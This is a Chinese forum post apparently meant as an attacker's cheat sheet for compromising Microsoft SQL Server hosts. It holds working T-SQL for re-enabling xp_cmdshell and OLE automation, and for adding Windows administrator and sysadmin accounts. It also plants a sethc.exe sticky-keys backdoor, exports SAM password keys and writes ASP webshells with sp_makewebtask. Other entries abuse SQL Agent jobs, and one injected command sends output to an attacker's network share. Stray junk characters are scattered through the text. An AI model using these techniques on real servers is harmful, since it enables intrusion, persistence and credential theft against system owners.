1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
* Z# d7 { \$ F& S4 ]恢复方法:查询分离器连接后,
- G* i( f6 [6 m; F' b3 t第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 3 x! i) t+ D6 w, X$ r* v
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' * g4 y- u) X B% ?' F3 C1 D
然后按F5键命令执行完毕
# U2 N: X2 I! f; |4 L1 Y) B# m8 [( Y. i0 ~( T
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)) l# U. B& D2 l3 E0 c* O
恢复方法:查询分离器连接后,
3 S* f4 }& S3 c第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
3 B |( @0 F6 X3 H: @* |. c4 F: H第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
% @: H ?' G- ^( [$ I然后按F5键命令执行完毕
1 S0 }. N8 u) \/ y: e4 Z
2 \% F' @4 O. \! l/ c3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
' T) H. }- p: `* b3 ~恢复方法:查询分离器连接后,3 ^/ q7 J9 W7 i3 U- p' X+ q9 y; a
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
$ e; u- g- U9 w/ X0 g' k% b第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 4 B1 f F* A4 j/ |; `
然后按F5键命令执行完毕
2 v! M% K Z& c3 M4 C9 i
( m% z/ W; ]6 P# h4 终极方法.
6 a, e3 e* C( q0 T8 }0 |如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:9 [; o0 T) }: d7 m: i* p: J
查询分离器连接后,
e/ H. U% j* X4 |- h' C2000servser系统:, W( _* C! \7 T! \3 e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
, l. N/ _8 z6 e' X/ j1 q1 C3 F" d1 A0 M. k2 O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
4 U9 p- k; k0 P# Y% ?( M# P
- i8 n% J% T W" s4 Sxp或2003server系统:. n& V2 H0 N. ^& f: x u* c
6 J6 Q+ a7 P& P5 j1 B$ `
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'1 |+ z' l* q: Q$ q/ T. Y0 [
9 A) Q# g$ R' r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'; m: }4 P, t& `8 |5 W
|/ o$ l& W) @, @% u& G; ~ D; M$ g- k
五个SHIFT
7 M; b) o! k: bdeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';+ b; m8 G+ g+ g# {
# x5 N% ?+ m; v; v; |declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 4 g; M7 H7 m9 [' Y
9 `8 U- v' g, G: N# ?2 S4 v/ Rxp_cmdshell执行命令另一种方法; p4 t. i0 @* k; z' B Y
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
" U& C s) p& v! X R# S3 ~- s
7 n- G' a" O; b, F4 d判断存储扩展是否存在
) o: Q9 l: L$ l* h- c- JSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'+ N! f: x! B- {9 g$ X
返回结果为1就OK8 M9 h5 K x# O& c
" Y. H$ L7 Z/ U* l
* ]4 f3 s2 h1 n, |. U6 j上传xplog70.dll恢复xp_cmdshell语句:* Z' F v, m0 V( w
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'% U( @! r: g7 e- u
& n$ k$ S3 |- g9 M
否则上传xplog7.0.dll3 F4 g; K" z' `$ X5 V8 ^2 b7 @
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'/ i* e6 }0 W+ O2 C* P
$ Y# D! Q1 h) x' i
! G2 U0 d$ x$ j8 f
+ Z* k5 _3 c$ G
首先开启沙盘模式:
9 h" K6 \8 _; {" ^exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
4 E. `7 [5 q5 f+ h5 h* H6 n! D$ J4 N s
* \+ @. p: Z* _- n% a, k然后利用jet.oledb执行系统命令3 n8 }9 F( C: @. R9 _+ R8 ~( p
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')% ^8 C) |" ^$ U: G+ |& z
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
- j. e1 n& s% {6 t, u
6 k3 n5 w+ J( u$ j! Q
2 o |3 i! |( r4 q( F c+ a; W. U3 l G C* e
恢复过程sp_addextendedproc 如下: : V( ^: N; O+ k( ?
create procedure sp_addextendedproc --- 1996/08/30 20:13 1 j+ {4 y( m( C3 i2 U, e l. w
@functname nvarchar(517),/* (owner.)name of function to call */ * ^; Q2 X+ N# i4 L
@dllname varchar(255)/* name of DLL containing function */ * ?9 L$ ?! N0 F7 @ ~; s# d' s
as
6 ^1 }$ i' ~+ {1 ~- e( ?/ bset implicit_transactions off
5 s" t6 m+ m9 B6 d* g$ Wif @@trancount > 0
8 g. s: Y3 s0 i$ \begin
8 t. F- O0 C. Z2 U P0 C# mraiserror(15002,-1,-1,'sp_addextendedproc')
9 p1 D* T" w9 M4 L* Greturn (1) * Y0 M, @9 d1 O7 \( t1 P3 p
end 2 D! c) k$ ~/ D9 l- R" z
dbcc addextendedproc( @functname, @dllname)
: S3 _ x# g) {7 K7 @$ T( ?return (0) -- sp_addextendedproc 2 X) D9 u N) G' I0 t& k
GO
. O9 R. |' _ h
7 R5 f2 F' i6 ~4 b9 ^+ y0 n* b% M
! r" j' @( n6 r. s7 P6 ~
& S7 ~9 K- M( d' G/ U导出管理员密码文件
2 L4 ^ H6 a o$ x4 B' j: ^/ Hsa默认可以读sam键.应该。4 F* m% H) T" z7 ~3 r; \6 A( c
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg2 M; z K {; u' i
net user administrator test* d$ {% R0 J8 |2 v! ]# H
用administrator登陆.
+ q w% n; H% Q用完机器后
+ {5 S9 n+ n4 sreg import c:\test.reg
. W1 B/ }0 ^5 u根本不用克隆.
4 |$ O$ \- c8 L" m6 R1 S找到对应的sid.
1 K$ y5 N5 x5 J8 R
1 a1 f0 y8 a! h) _5 c5 T5 X, Z, Z" N% x4 y& ^
8 B- m, M$ d* k
恢复所有存储过程+ W, I$ H4 I! @" v
use master + s# |! H% z2 `2 S
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' % R. u! H" \ c" s0 {( y9 }
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' & s% A( z% H5 }! k. U5 _: w4 r
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' - q4 G/ Q- g" `4 x- D+ F3 Q
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
. p; w# U4 z$ o3 Y. e* R0 l/ L/ `5 Vexec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
$ A: F9 ~% ]" X5 Z) t# R2 n) \7 wexec sp_addextendedproc sp_OACreate,'odsole70.dll'
: @8 w2 J' ?8 J0 |( Vexec sp_addextendedproc sp_OADestroy,'odsole70.dll' & |# \2 s- B1 D& F
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' , |2 u5 [! z& H, D
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' ) R; u" [: ]& ` h/ w0 s
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
( E2 p+ G( h1 i7 _$ Z# Lexec sp_addextendedproc sp_OASetProperty,'odsole70.dll' $ G" P1 N/ u' X
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
5 r# p* {, G0 d+ uexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' * S% _$ @; U2 v
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' * f$ c1 O2 h, N$ S8 P
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
* P l" d/ D* s- d4 l. K- n. Wexec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
4 P2 g" s( Z6 U" D( J& ~. Rexec sp_addextendedproc xp_regread,'xpstar.dll' 9 }6 ?5 t0 r0 ^0 ^
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
7 K0 A; B1 U# b! Z% ?7 U! Lexec sp_addextendedproc xp_regwrite,'xpstar.dll'
: _+ k9 Y( T Aexec sp_addextendedproc xp_availablemedia,'xpstar.dll'. c, Z `+ y' r( [; @9 C& @; p
' [* F" Q% s2 |* v+ p2 V* c% {9 m
( m$ I! Z: o9 n0 J: l! |+ A建立读文件的存储过程
" V {, y, L/ W1 M4 p- pCreate proc sp_readTextFile @filename sysname
4 a+ y, D5 \" [: ?as% B9 \" S# T9 l
# t% ?; w% x# i4 _- y$ w# W+ }! w7 g
begin
; V. t# `$ m' G6 g* p. V3 ^0 W set nocount on
- I+ `+ B* K) w: g" d# m Create table #tempfile (line varchar(8000))8 S! D) Q! o- h/ m9 N
exec ('bulk insert #tempfile from "' + @filename + '"')5 x3 g+ k8 m3 o" Z3 o: q$ f
select * from #tempfile, e7 x! G$ J' {5 O, v9 ]# Z
drop table #tempfile
/ e `; u0 A' S# X- H7 |End
1 y8 j; s1 x3 w8 P- ] }1 Q l: D9 s- E2 H- q) N
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
! s; e3 c% `7 N1 d, x查看登录用户. }/ s5 N2 D) I* F/ R
Select * from sysxlogins' u5 v% L1 {8 C1 k1 G `4 Y
" q2 P- Q# a* b! t {* T# O把文件内容读取到表中
/ o2 U4 w8 G3 \( a. k7 B5 l2 V1 MBULK INSERT tmp from "c:\test.txt"
. x5 [, S3 j9 {9 x2 O4 _6 TdElete from 表名 清理表里的内容
4 F2 X" X3 \+ | b, a( |- p. wcreate table b_test(fn nvarchar(4000));建一个表,字段为fn
8 O3 X+ C" U- b# b7 P0 I6 T
3 g# d. w' ?0 t( v
3 O- I Y" F D5 p# Q1 w加sa用户: `! \4 Z% ~# H; C' g' Y7 F5 z
exec master.dbo.sp_addlogin user,pass;
, w' i+ l3 l$ W/ j i2 v. K, Pexec master.dbo.sp_addsrvrolemember user,sysadmin
- W7 A! S, I; b/ @. B/ Z: D
: e+ j, e. T0 r+ g! n9 I! W
7 g5 w8 y0 e/ K0 G( B9 h8 g2 h
2 S5 ~3 g( Z+ i读文件代码0 Q* L# r- W% N" Y: i3 u- c
declare @o int, @f int, @t int, @ret int' n( @! ^5 l. N5 z
declare @line varchar(8000)
( y" K# U+ g4 j6 e: e5 oexec sp_oacreate 'scripting.filesystemobject', @o out) L) g% E5 q, O9 A' e
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 17 o& C5 m c! d% ^$ m* a8 v
exec @ret = sp_oamethod @f, 'readline', @line out( O; F% _3 w6 I! i& ^
while( @ret = 0 )' X( G; i3 S! W
begin
$ h; o. |& U- x' sprint @line
1 v4 @5 }9 X$ k5 o* Kexec @ret = sp_oamethod @f, 'readline', @line out
4 Y. n% h! [: S6 ~7 }% |end" x d3 U2 R* |+ f8 E
, Z) I) N9 K/ |
3 b8 H' `* O7 }6 ^& E# q写文件代码:
n& j/ `3 p' |* i- ]' [( Xdeclare @o int, @f int, @t int, @ret int
" b$ P6 y- @2 X3 a& N' wexec sp_oacreate 'scripting.filesystemobject', @o out/ c! S' S# ^* M) N5 u3 u
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
" t5 `& n$ i2 \: Q6 M7 ^exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》7 l4 S9 l( J! B+ s ^; [8 x
; ?3 r }/ g. p8 l% A$ y
7 |/ C5 r4 K, a+ u! H添加lake2 shell+ x; W8 _. V0 k, {
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
" U7 y0 w7 I8 x6 |* fsp_dropextendedproc xp_lake2
& E2 L# i, w. F/ H2 DEXEC xp_lake2 'net user', i3 J( R9 L: }: ]1 v
9 l8 I U& N; c. J3 C. Z
- R! s: X6 ~* z" y得到硬盘文件信息 4 L3 A6 g( _6 `% \+ i% a0 n
--参数说明:目录名,目录深度,是否显示文件
1 f, d) X8 ~1 H7 O* M% Sexecute master..xp_dirtree 'c:'
: e e5 d# y' f% B- G7 n7 J% Mexecute master..xp_dirtree 'c:',1 8 Y( n$ o# j4 l+ \0 A
execute master..xp_dirtree 'c:',1,1 2 }5 S! g5 H8 A
, G! ^; q( o1 L( W- x0 z' f. ]
2 x2 n" z3 q5 Z7 }& _" A! ^读serv-u配置信息8 |3 E+ M5 w. E7 t0 q
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'9 z, T" ?- ^2 @) {7 ]* b$ `
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
$ _8 w O% I$ S" F4 P9 e3 A/ O e+ l- @* X* o9 z
通过xp_regwrite写SHIFT后门
0 R5 `5 z) h; _0 `( P u/ Z5 \: Eexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
! q e( Y1 D+ q" H
; N. Y8 g |/ T, _' L# `& N6 X) | h% a$ f2 n9 j5 P
; C3 H% A5 ?! W$ I
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';3 z7 Y" E0 b& u7 Q
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
2 K g K/ O4 I+ j8 K" R2 u
# f5 e) @- f J" x( dEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'$ A7 t: } h S. m. N; D1 T
: q4 s5 ?% `* B9 d, E$ E* d/ \* q) K4 B& t* V
8 ?. c2 m3 ^. N# m" a6 k6 r
sql server 2005下开启xp_cmdshell的办法" z: s. L( j% V4 R7 n
% {6 B% n3 l0 Z4 l) C, P$ ]4 M+ ZEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;: m. c! @* ~9 n0 B
( l8 o; M& ^" J8 ^* P7 |
SQL2005开启'OPENROWSET'支持的方法:+ E$ ~8 ], `0 H/ F3 \
i; p: T; k+ d: `( uexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;% m7 A. L1 S* Y8 @
{; J3 L6 X2 [5 E2 h, v7 X" V/ v$ M
SQL2005开启'sp_oacreate'支持的方法:/ A# |; R3 x$ p3 B1 G8 M6 I
, { h7 m4 H$ u/ ` Y; @5 Aexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;/ T" W3 c; i% q# @8 l6 m- E
" o e5 S8 A5 ]5 Y" F; g+ r0 x
! ?2 p3 [) |6 R9 _. y
1 ^" j; d$ [8 p* }1 y: n) B) Z1 o* a5 c+ D( e0 i
: Q5 t+ T6 t) f' h' R$ W6 U- n1 E
8 _5 a7 z# o* j5 b# f5 c8 w# @0 [+ f: {
L7 y/ Y- I. i r6 z6 d
% l" y5 J- r; w6 \$ F- j4 l' U3 \, d$ y. s
5 O+ r0 D) b- t
1 n, ^7 Q8 V8 r& i7 y3 R$ N) ?* M0 X4 x3 M' H
( T I' X, N* H) {0 g
: U8 i4 A, i O4 p( c, c2 y k# Y/ G1 g6 ^& L" N: B
6 E* ~7 w5 s! v/ R g; _
$ m/ Q5 O: Y, S F {9 P# c; U) _4 L; h7 h4 l
Z( b* C: F) J, C% s4 K& e" x: s! \+ J2 v1 V* E0 R
- m# G( T1 c* ?
: D' K) A( ?" C; J7 `( d
; C; |2 I- |/ E以下方面不知道能不能成功暂且留下研究哈:. w( Q; }2 T7 A+ ~4 ]
4)
% N* p7 u: e8 s- r4 l6 e3 G" t- Euse msdb; --这儿不要是master哟
+ _. b7 i% T6 j1 Zexec sp_add_job @job_name= czy82 ;* G9 G/ C" ^2 e. x/ Q8 T: K1 x7 {
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;6 J+ B2 a- ~& C4 _
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;& z" Z. h3 _. w" k4 R$ T( n* P6 ]
exec sp_start_job @job_name= czy82 ;
9 M5 P' ~8 ?2 h- B F# c3 S7 v1 Y9 a* E3 h$ j4 I5 f
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以4 t( L; Z. j5 H* p3 V7 U; ^
执行tsql语句了.
l4 O1 I8 ~+ x+ L对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名* o' j# l: ^7 @4 h
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
S1 O. J' Y5 n' T/ u# s, \, Vnet start SQLSERVERAGENT/ M) @" }( b. g* i
1 Y* p: h& {; Z( r7 m, P5 h5 S/ B对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的) x9 n2 Z3 y0 h: n+ F
USE msdb) c+ `$ l4 i% X& ^. Y! [! K
EXEC sp_add_job @job_name = GetSystemOnSQL ,( L* p9 }, @, r3 d
@enabled = 1,* z5 n0 _1 ^) N, a2 M+ X
@description = This will give a low privileged user access to) ?$ ^5 ~3 ?( _: F) ~5 Y
xp_cmdshell ,( k- E+ I5 X4 v+ {
@delete_level = 1& L& F5 F5 x* S; Q) w+ l
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
9 A0 z& P+ n% K' W, u@step_name = Exec my sql ,: e) Y0 i; n: A, U- m1 t
@subsystem = TSQL ,$ B. Q6 Y/ f1 v2 z6 S7 K/ M5 }
@command = exec master..xp_execresultset N select exec& h6 U( g7 O/ l
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master / `% t. V! O1 r+ W1 D* c$ t
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,% I' I$ }& r, o; j
@server_name = 你的SQL的服务器名
7 I& ^" L3 v3 m# g; } xEXEC sp_start_job @job_name = GetSystemOnSQL * h9 R9 `1 \& w5 F u0 j
6 @/ a+ E7 ?" E! c+ X3 A不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
, L2 l+ {: a& \3 l4 J8 z才让我们可以以public执行xp_cmdshell. f7 b. T) Z b- g0 F3 p
8 C4 O4 i' g# j4 z
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)9 W. h) s6 L4 g8 m" P6 r, M
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968' g# y' j) f# w5 x: C
/ `; |4 s% ~' S/ {9 Q* m8 Z# ]USE msdb
! P1 i2 r8 w- K4 z7 GEXEC sp_add_job @job_name = ArbitraryFilecreate ,
6 K) n, Z. e' S: r" t: ^5 h% k @@enabled = 1,9 I B, @$ b G4 P0 |* H
@description = This will create a file called c:\sqlafc123.txt ,
4 [, L# O% C+ M+ K% X, U@delete_level = 1' U2 X1 i6 O. J! Y* u4 R- A
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
, _! L# p3 h* ?# q/ F& V' S@step_name = SQLAFC ,! f; h9 r5 S* A# M5 }6 I1 X
@subsystem = TSQL ,
8 A& p" _* j' K" b6 @: O F! k$ ^@command = select hello, this file was created by the SQL Agent. ,. _0 ^+ q1 I' n4 |
@output_file_name = c:\sqlafc123.txt
5 q* A) R; H ^( o) {# kEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,# S6 ~4 N& x! [! N7 v# Q: g( p9 u+ o
@server_name = SERVER_NAME
o9 w4 M/ R% @% }EXEC sp_start_job @job_name = ArbitraryFilecreate . E8 e" S7 T- M1 z' U4 M
0 a/ `, ]6 j& _: F) K" d; [/ f
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
9 C7 `! r4 I" |7 J- t9 w3 I1 n7 I* E( l% {2 d# Y) @ Y8 c) I% X
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19( J, m9 t' e. ]$ j
----------------------------------------------1 a+ ?* b5 j9 @
hello, this file was created by the SQL Agent.
/ P7 L! U0 P$ ~4 [; E6 j. ~) s* N) K" n: q* ?5 d. z# r
(1 ?????)
/ V: w5 M5 @- A8 ^. Q. G% ]' f3 O* A; P8 C2 `, s7 ^. g
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
5 s f, O+ U! B0 C3 p命令的vbs文件到启动目录!$ Y9 k, [. R7 v4 ~9 P( E& X( n/ u/ V
! m0 K2 q3 F* X: W7 F
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)- T! u! x; v- a' \
关于sp_MScopyscriptfile 看下面的例子6 O- Z2 n0 L) z8 M
declare @command varchar(100)
3 `( d6 D0 }* z8 E/ sdeclare @scripfile varchar(200)
0 V4 L* C/ q' M, N& F, Pset concat_null_yields_null off
. R9 T. u, o2 r: F% gselect @command= dir c:\ > "\\attackerip\share\dir.txt" . N. G; g, _, U/ i* a4 c( J
select @scripfile= c:\autoexec.bat > nul" | @command | rd " 9 V: z+ t' e2 W% u0 i
exec sp_MScopyscriptfile @scripfile , % ~5 h7 B8 n. v8 M# O4 A
- p4 l% Z S8 p9 L6 U8 K8 B这两个东东都还在测试试哟
) d6 w+ F5 S! Q( I' [4 M让MSSQL的public用户得到一个本机的web shell ! P* U2 x- d$ E- {. E5 `! i
8 X6 p( N' [+ b4 q6 \/ |sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,+ f) q8 G+ R, i# r5 E
--@query= select <img src=vbscript:msgbox(now())> - Z+ _; V0 ]( h6 Q. J9 c [
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> 8 `' Z( Z( k4 S$ u# C* o' X
@query= select ) `' [ Y+ r: r( ^9 I/ J* U
<%On Error Resume Next
0 a( V# X% P, }# ?7 N" o( ]; SSet oscript = Server.createObject("wscript.SHELL")
: V3 F. w' b2 c' rSet oscriptNet = Server.createObject("wscript.NETWORK")
2 J0 ] d; r. R' L# RSet oFileSys = Server.createObject("scripting.FileSystemObject")
1 L7 O! h/ D- b' UszCMD = Request.Form(".CMD") ; S. G5 e2 H( \ R5 z9 D5 r
If (szCMD <>"")Then
3 ~# F( @) g9 O& \1 LszTempFile = "C:\" & oFileSys.GetTempName() ' u( S9 I6 @0 z& Y4 O
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 5 N+ X6 [3 a9 ]
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
( l& k$ c5 ?) N( OEnd If %> 7 C, y2 ~4 h/ p: L
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> 2 w9 U; z" f5 n5 H
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> + [8 t8 ^, o4 _% y* V8 T) h* m$ I
</FORM><RE>
6 r: O# F! ^ ^<% If (IsObject(oFile))Then ; e: g5 Q6 }' K& m) L
On Error Resume Next
$ x# J- j, B6 L4 _Response.Write Server.HTMLEncode(oFile.ReadAll)
7 N2 ~2 }& `6 I/ d! j zoFile.Close , o# {, e" z) z. P9 E. b
Call oFileSys.deleteFile(szTempFile, True)
( b0 R- i$ f2 A# `# o9 K8 A6 gEnd If%>
1 a# D# I' O- P; R e# [5 }9 k</BODY></HTML>
: ~, K' G6 p5 `" i9 e* d |
发表于 2012-9-15 14:37:30
收藏
支持
反对